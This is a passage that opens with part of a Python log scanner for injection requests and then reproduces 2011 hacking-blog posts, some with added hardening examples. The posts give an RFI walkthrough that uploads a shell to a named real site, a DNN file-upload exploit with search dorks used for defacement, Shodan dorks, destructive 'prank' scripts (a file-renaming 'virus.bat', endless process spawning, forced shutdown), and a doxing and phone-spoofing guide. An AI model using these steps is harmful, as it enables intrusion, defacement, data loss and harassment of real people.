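    return [unquote_plus(v) for _, v in parse_qsl(query, keep_blank_values=True)]


def classify(target):
    """Names of the rules that match any parameter value of the request."""
    values = decode_params(target)
    return [name for name, pat in RULES if any(pat.search(v) for v in values)]


def scan_log(text):
    """Yield (ip, target, hits) for every line that triggers at least one rule."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not in the expected format; skip
        hits = classify(m.group("target"))
        if hits:
            yield m.group("ip"), m.group("target"), hits


def suspects(text, threshold=2):
    """IPs with at least `threshold` flagged requests, most active first."""
    counts = Counter(ip for ip, _, _ in scan_log(text))
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits), target)
    print(suspects(SAMPLE_LOG))
```

The rules match on decoded parameter values, not on the raw request line, because the payloads arrive percent-encoded; the per-IP threshold separates a single odd request from the stepwise guessing both posts describe, which always produces many near-identical requests in a row.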

Wednesday, February 2, 2011

Prevention against SQL Injection

Hello Friends, these days I have hacked many sites using SQL Injection. So I thought about writing how to protect our web page against this attack. There are many methods to prevent SQLI, but I am writing a few of them.
Let's say our code is

<?php
// Vulnerable: $_GET['id'] is concatenated straight into the query text.
$display = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
// mysql_query() returns a result resource, so fetch the row before printing it
$row = mysql_fetch_assoc($display);
echo $row['text'];
?>
This means that we are selecting the page content 'text' from 'pages' in the SQL database, and we are selecting the right page content with $_GET['id'], where $_GET['id'] is the value in the URL, for example
                       http://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace the above code with the code written below, then I guess we are 99.9% secure :P

<?php
// mysql_real_escape_string() only protects a value that sits inside quotes in
// the query, so the escaped id is wrapped in single quotes here.
$display = mysql_query("SELECT text FROM pages WHERE id='" . mysql_real_escape_string($_GET['id']) . "'");
$row = mysql_fetch_assoc($display);
echo $row['text'];
?>
In the above code mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. This function must always be used to make data safe before sending a query to MySQL, and it only helps when the escaped value is placed inside quotes in the query.
Alternatively, we can check $_GET['id'] for illegal and unwanted characters like this:


<?php
// Reject the request if the id contains one of the blacklisted SQL keywords.
// This is a blacklist, so it only catches the keywords listed here.
$id = strtolower($_GET['id']);
if (strrpos($id, 'union') !== false) {
    die;
}
if (strrpos($id, 'select') !== false) {
    die;
}
$display = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($display);
echo $row['text'];
?>
Similarly we can block information_, _schema, admin, order and other such keywords. :)
If we want, we can also use JavaScript to block and filter characters. This would also be useful to get rid of basic SQL string injection done at login forms.
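As an added example, not code from the original post, here is the same page lookup written with a prepared statement through PDO, which is what the mysql_* functions used above were later replaced by (they were removed in PHP 7). The query text and the id value are sent to the server separately, so the id is never parsed as SQL, and the id is also validated as a positive integer before use. The DSN, database name and credentials are placeholders. Server-side checks like this are what count; JavaScript filtering in the browser is a usability aid and does not protect the database.

```php
<?php
// Added example (not the original post's code): page lookup with a prepared
// statement. Connection details below are placeholders.

function fetchPageText(PDO $db, $rawId): ?string
{
    // Validate first: the id must be a positive integer, otherwise reject it
    // instead of trying to "clean" it.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The ? placeholder is bound as data; the SQL text never contains the input.
    $stmt = $db->prepare('SELECT text FROM pages WHERE id = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();

    $text = $stmt->fetchColumn();
    return $text === false ? null : $text;
}

// Placeholder connection settings (assumption: a local MySQL database "site").
$db = new PDO(
    'mysql:host=localhost;dbname=site;charset=utf8mb4',
    'dbuser',
    'dbpass',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$text = fetchPageText($db, $_GET['id'] ?? '');
if ($text === null) {
    http_response_code(404);
    exit('Page not found');
}

// Escape on output as well, so stored content cannot inject HTML into the page.
echo htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
```

With ATTR_EMULATE_PREPARES set to false, the MySQL server receives the statement and the bound value as two separate messages, so no escaping rules or keyword blacklists are involved at all.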

I hope you like this post :=))

Tuesday, February 1, 2011

Advance search engine for hackers - SHODAN

Hello Guys, are you tired of using Google dorks to search for your target? Or do you think that it takes time to search for a vulnerability because it is a hit-and-trial method :P
Today I am posting about the SHODAN search engine. I found it very useful in searching servers, routers, webcams, ports etc. It finds computers running certain software (HTTP, FTP etc.) and, most interestingly, it filters hosts based on geographical location directly.
    SHODAN stands for Sentient Hyper-Optimized Data Access Network. It gives more accurate as well as more helpful information. If you are really looking for a vulnerability then use Shodan and Google and you will feel the difference. I am saying this because Google looks at the web content only, whereas Shodan can show you in plain text the network part of the host.
Here is the website's link: http://www.shodanhq.com
e.g. Let us suppose I want to search for hosts which are running an IIS 5 server; then my query will be:

http://www.shodanhq.com/?q=iis+5.0
It gives results like:

" HTTP/1.0 403 Forbidden 
Content-Length: 1283 
Content-Type: text/html 
Server: Microsoft-IIS/6.0 
MicrosoftOfficeWebServer: 5.0_Pub 
X-Powered-By: ASP.NET 
Date: Tue, 01 Feb 2011 20:37:47 GMT  "


Just like this you will get 1123104 results for iis 5.0.
Here I am posting some dorks for SHODAN that will help you to search:

http://shodan.surtri.com/?q=cisco-IOS
http://shodan.surtri.com/?q=IIS+4.0
http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)
http://shodan.surtri.com/?q=Fuji+xerox
http://shodan.surtri.com/?q=JetDirect
http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
http://shodan.surtri.com/?q=port%3A80+iisstart.html
http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM
http://shodan.surtri.com/?q=Netgear
http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22
http://shodan.surtri.com/?q=Golden+FTP+Server 
http://shodan.surtri.com/?q=IIS+5.0  
http://shodan.surtri.com/?q=IIS+6.0
http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP 
http://shodan.surtri.com/?q=Wordpress
http://shodan.surtri.com/?q=Joomla
http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server
http://shodan.surtri.com/?q=FreeBSD
http://shodan.surtri.com/?q=IPCop
There are more dorks; if you need them just send me a mail.
Now the rest depends on your brain and common sense. Use your intelligence to use it efficiently.
Happy Searching :=))
  

Monday, January 31, 2011

RFI (Remote file Inclusion)

Well friends, today I am writing about how to hack a website which is RFI vulnerable. RFI means you can upload or link any remote file to the website. If you are lucky enough then you will be able to execute your script, and as a result you can own that server or deface that website completely. If the server is unpatched then it can be exploited using this vulnerability. This method is as powerful as SQL injection and requires a little brain compared to the latter. So guys, let's have a look at how to find an RFI-vulnerable site and how to hack it :)

Before going further, make sure that you are using a strong proxy :P

To find an RFI-vulnerable website you can use Google dorks. If you need dorks then mail me and I'll send you a huge list of dorks.
For example:
http://targetsite.com/index.php?page=home


You can easily guess what the above URL is doing: it simply fetches some text data from the server and displays it in the webpage. This is the stage where you need a little brain and your creativity :P
Let's say I change the above URL to:



http://targetsite.com/index.php?page=http://www.google.com

If you are redirected to Google's page then you've got an RFI vulnerability in the site, woooohhhhhhh.....

Real example:
http://www.cbspk.com/v2/index.php?page=http://www.google.com.
This site is RFI vulnerable but the server is patched.

Don't get too excited, because now the real stuff starts, so keep your eyes open.
Now what you all need to do is upload your shell to your server and point the target site at that shell. If your shell executes successfully then it's time to party.... now you can handle your target site. If your shell does not execute then don't worry, try once more by adding a null byte; even if you don't succeed, try changing the shell's extension, like shell.php to shell.php;jpg.


NOTE: the shell will only execute if the server has PHP support and is unpatched.


Here you may also need some basic knowledge of bash commands, because nowadays most servers run on Linux.
I wish you happy hacking :=)
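As an added example, not code from the original post or from any site mentioned above, here is the hardened form of the index.php?page=... pattern: the page name is looked up in a fixed allowlist and the request value is never used as a path or a URL, so it can never name a remote file or an unexpected local one. The page file names and the pages/ directory are assumptions.

```php
<?php
// Added example (not the original post's code): allowlisted page include.
// Assumption: page files live in a pages/ directory beside this script.

const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(string $requested): ?string
{
    // Only an exact allowlist key is accepted. The request value itself is
    // never concatenated into the path, so "../" or "http://" in it is irrelevant.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

$page = resolvePage($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}

require $page;
```

Alongside this, allow_url_include should be Off in php.ini (it is Off by default), so include and require cannot fetch remote URLs at all, and the application-level allowlist then protects against local file inclusion as well.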

Sunday, January 30, 2011

Lock folders without any software


Guys, this is a cool trick by which we can lock our folder without using any software. All you need to do is copy the code written below and save it as "my folder.bat". You can also make an executable file of this .bat file by using "bat to exe converter". In the code below the password is "hackersgallery"; you can replace this with your own password. :) Note that this only renames and hides the folder: nothing is encrypted, the password sits in plain text inside the batch file, and anyone who enables showing hidden and system files can open the folder.


cls
@ECHO OFF
title Folder Locker
rem If the renamed, hidden folder already exists, offer to unlock it
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
rem If there is no Locker folder yet, create one
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set /p "cho=>"
rem Both sides are quoted so that an empty input does not break the IF syntax
if "%cho%"=="hackersgallery" goto LOCK
if /I "%cho%"=="n" goto End
echo Invalid choice.
goto CONFIRM
:LOCK
rem Renaming to a Control Panel CLSID makes Explorer show it as the Control Panel
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set /p "pass=>"
if NOT "%pass%"=="hackersgallery" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto End
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


Cool Notepad hacks

This will pop up endless Notepads until the computer freezes and crashes.
Copy the code below into Notepad and save it with a ".bat" extension (it is a batch script, not VBScript).
Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

(======================================================)
CAPS LOCK CRAZY TRICK
Copy the below code in notepad and save it as ".vbs" extension



Code:-
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

(======================================================)
UNLIMITED BACKSPACE HACK

This makes it so that the backspace key is constantly being pressed.

Code:-
MsgBox "Let's go back a few steps"
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop



(======================================================)

Hack your friend's keyboard and make it type "You are a fool." continuously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

(======================================================)

Convey a message to your friend and shut down his / her computer:
Save it as "Anything.BAT" with the file type set to All Files

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

(======================================================)

Disable your internet temporarily
Save it as anything.bat


code :
ipconfig /release

(======================================================)

Copy the text into Notepad and save it as virus.bat

Don't open this file on your own PC


REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

(======================================================)


Copy the text into Notepad and save it as virus.vbs

code :


Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


(======================================================)
USE TO SWAP MOUSE BUTTONS
Copy it and save it in .bat file format

code :

@echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------

(======================================================)

Thanks, if you like it I'll post some more cool tricks :)


Wednesday, January 26, 2011

Hack a site using DNN



This method is simple, but many sites got hacked using it, including gov sites and military sites.
If the server is not patched then you can easily upload your shell there and execute that shell; as a result you can deface that site. But I recommend you not to deface sites, just use this info for your knowledge.

e.g. of this attack --> http://www.liadvantage.info/portals/0/hacked_by_00733.jpg
I think you have got it.

Before going further, make sure that you are using a strong proxy server :|

1st Find The DNN 

Go To Any Search Engine

Take Google

And Search This Dork

:inurl:/tabid/36/language/en-US/Default.aspx
                                  OR
inurl : /portals/0/

See The Results And Select Any Site As Target

You Will See This Part In Every Site That You Searched For

/Home/tabid/36/Language/en-US/Default.aspx

Now Replace This With

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx (exploiting)

You Will Enter In The Gallery Page

Now Select

File ( A File On Your Site )

At This Point Copy This Java Script And Paste It In The Address Bar

javascript:__doPostBack('ctlURL$cmdUpload','')    {call doPostBack method to upload local files}



You Will Find The Upload Option

Select Root And Upload Your File

Your File Then Will Be In The Root

Then Put This In End Of URL

portals/0/yourfile.yourfile format

You're Done, Enjoy !!!

Tuesday, January 25, 2011

White paper......on server rooting (rooting linux boxes)

Today I am very happy and impressed by my friend's work: he has written a paper on how to root a Linux box. After rooting the server you can then own every site on that box.
##################################################################

# Title: Rooting Linux boxes for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH

###################################################################
Here I am posting a direct link to his paper--> http://goo.gl/FmwUY


Kudos goes to cyb3r Shubh4m

Doxing Tutorial (Get Personal details)


Suppose you want information about someone..
e.g.:
Name
Relatives
IP
Bio
Location
Profile Links
Email
And anything else that we could find. But DOXing isn’t all about just writing down information. You sometimes have to use your deductive reasoning to figure things out. The main thing about DOXing is that you want to move pretty fast, but also give yourself some time to look over the information that you’ve gotten. So I’m sure some of you (the new people to this section) are wondering “What are the best sites to find DOX?” well here ya go.
http://www.pipl.com
(Searches for emails, names, usernames, etc.)
http://www.google.com
(Searches for everything)
Reverse Search for pictures:
http://www.tineye.com
Reverse area code search:
http://www.telcodata.us/telcodata/telco
Reverse Phone number search:
http://www.whitepages.com
http://www.411.com
***Us*** Criminal Record Check:
http://www.criminalsearches.com/
Realtor Home search:
http://www.realtor.ca/
Electoral Roll:
Births
Marriages
Deaths
Company Director Addresses
http://www.lookuppeople.co.uk/
Secondary people search other than pipl.com:
http://www.com.lullar.com
Gather Information on people’s cameras by just uploading an image:
http://regex.info/exif.cgi
Once the target is acquired, send free empty boxes:
http://www.usps.com/
Telephone Spoofing:
http://www.telespoof.com/freecall/agi
So Easy na............................
there are many other things to do....................:)